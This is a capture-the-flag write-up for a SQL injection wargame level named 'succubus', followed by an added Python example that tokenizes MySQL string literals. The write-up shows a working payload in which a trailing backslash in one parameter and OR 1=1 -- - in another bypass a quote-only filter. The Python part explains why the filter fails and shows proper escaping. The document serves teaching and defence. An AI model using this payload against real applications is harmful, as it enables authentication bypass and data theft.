
succubus


We are provided with the SQL query:

SELECT id FROM prob_succubus WHERE id='{$_GET[id]}' AND pw='{$_GET[pw]}'

We cannot use single or double quotes in this challenge. Therefore, we need to find another way to modify the existing query.

Let's provide the following URI parameter:

?id=\

The resultant query becomes:

SELECT id FROM prob_succubus WHERE id='\' AND pw='{$_GET[pw]}'

The \ escapes the single quote that was meant to close the id value, so the string literal now runs through \' AND pw= and only ends at the quote that was meant to open the pw value.

Anything we insert into the ?pw parameter is therefore interpreted as SQL rather than as string data.

If we provide the following URI parameter:

?id=\&pw= OR 1=1 -- -

The resultant query becomes:

SELECT id FROM prob_succubus WHERE id='\' AND pw=' OR 1=1 -- -'
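The mechanism above as an added example, not code from the original write-up: a small Python tokenizer that applies MySQL's backslash rule to single-quoted literals, showing why rejecting only quotes does not keep input inside the literal while escaping the backslash itself (as a real escape function does, or parameterized queries) does. Table and column names follow the challenge; the filter and escape functions are constructed stand-ins.

```python
# Added example, not from the original write-up: a tokenizer with MySQL's
# backslash-escape rule for single-quoted strings. It shows why filtering only
# quotes is insufficient, and how escaping the backslash (as a real escape
# function does) keeps the input inside the literal. Sample values constructed.

QUERY_TEMPLATE = "SELECT id FROM prob_succubus WHERE id='{id}' AND pw='{pw}'"

def quote_filter_allows(value: str) -> bool:
    """The challenge's filter: reject single and double quotes only."""
    return "'" not in value and '"' not in value

def build_query(id_value: str, pw_value: str) -> str:
    """Unsafe: raw string interpolation, mirroring the PHP in the challenge."""
    return QUERY_TEMPLATE.format(id=id_value, pw=pw_value)

def escape_value(value: str) -> str:
    """Subset of mysqli_real_escape_string: the backslash is escaped first."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def split_query(query: str) -> tuple[str, list[str]]:
    """Return (sql_outside_literals, literal_values). In a literal a backslash
    makes the next char literal; '-- ' outside a literal starts a comment."""
    code, literals, i, n = [], [], 0, len(query)
    while i < n:
        ch = query[i]
        if ch == "'":
            i += 1
            buf = []
            while i < n and query[i] != "'":
                if query[i] == "\\" and i + 1 < n:
                    buf.append(query[i + 1])
                    i += 2
                else:
                    buf.append(query[i])
                    i += 1
            literals.append("".join(buf))
            i += 1  # step over the closing quote (no-op if unterminated)
        elif query.startswith("-- ", i):
            break  # rest of the line is a comment and is not executed
        else:
            code.append(ch)
            i += 1
    return "".join(code), literals

def injection_escapes_literal(query: str) -> bool:
    """True when the injected 'OR 1=1' ends up as SQL instead of string data."""
    return "OR 1=1" in split_query(query)[0]
```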
